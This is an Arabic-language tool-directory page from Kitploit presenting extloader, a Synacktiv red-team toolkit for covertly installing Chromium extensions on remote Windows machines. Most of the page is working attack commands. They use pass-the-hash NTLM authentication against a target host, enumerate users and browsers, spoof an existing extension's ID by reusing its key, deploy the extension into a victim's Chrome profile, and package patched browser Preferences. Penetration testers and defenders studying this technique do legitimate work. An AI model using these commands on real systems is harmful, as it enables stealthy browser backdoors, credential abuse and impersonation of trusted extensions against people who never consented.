Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
extloader — مجموعة أدوات لاستغلال إضافات Chromium | Kitploit
أدوات/GitHubGitHub/synacktiv/extloader
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubsynacktiv/extloader

extloader

مجموعة أدوات لاستغلال إضافات Chromium

عرض المستودع
262منذ 10 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

extLoader

مجموعة أدوات صغيرة لإدارة ونشر إضافات Chromium غير المعبأة.

اكتشف المزيد في التدوينة التالية: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

التثبيت

التثبيت المباشر (pipx)

root@kitploit:~
pipx install .
extloader --help

استخدم pipx للتثبيت المعزول الذي يستهدف Python 3.10+.

إعداد بيئة التطوير (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

خيارات المصادقة

  • كلمة المرور: -p/--password
  • الهاش: -H/--hash (صيغة LM:NT أو NT فقط)
  • المجال: -d/--domain (الافتراضي WORKGROUP)

المعاملات الشائعة

  • -t, --target: IP/اسم المضيف الهدف
  • -u, --username: اسم المستخدم
  • -i, --index: فهرس المستخدم من أمر check
  • --debug: تفعيل تسجيل التصحيح

الاستخدام

فيما يلي مثال خطوة بخطوة لنشر إضافة:

  1. أولاً، تحقق من الأهداف المتاحة:
root@kitploit:~
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

عندما تشغّل الاستغلال على جهاز مختلف، قم دائمًا بتشغيل الأمر check أولاً لتحديث السياق (available_targets.json).

  1. جهّز ملف manifest (وقّعه أو انتحل معرّفًا):
root@kitploit:~
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

لانتحال هوية معرف إضافة موجودة، تجاوز الأمر أعلاه واضبط مفتاح key في manifest على المفتاح العام base64 للإضافة التي تحاكيها. إعادة استخدام هذا المفتاح تُبقي معرف CRX دون تغيير.

  1. انشر الإضافة:
root@kitploit:~
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(بديل) أنشئ حزمة للنشر اليدوي:

root@kitploit:~
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file يتوقع ملف تفضيلات ملف تعريف المتصفح الذي قمت بنسخه احتياطيًا (يخزّنها Chrome/Edge بصيغة Secure Preferences، بينما تستخدم متصفحات Chromium الأخرى Preferences). يقوم المحمّل بنسخها، وتصحيحها، ويضمّن النسختين المعدّلة وغير المعدّلة في الحزمة.

root@kitploit:~
├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. استعادة التفضيلات الأصلية إذا لزم الأمر:
root@kitploit:~
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

المهام المتبقية

  • دعم Kerberos
  • وحدة nxc
  • تكييف سير عمل package مع Linux
  • تكييف سير عمل package مع macOS
تنزيل الأداة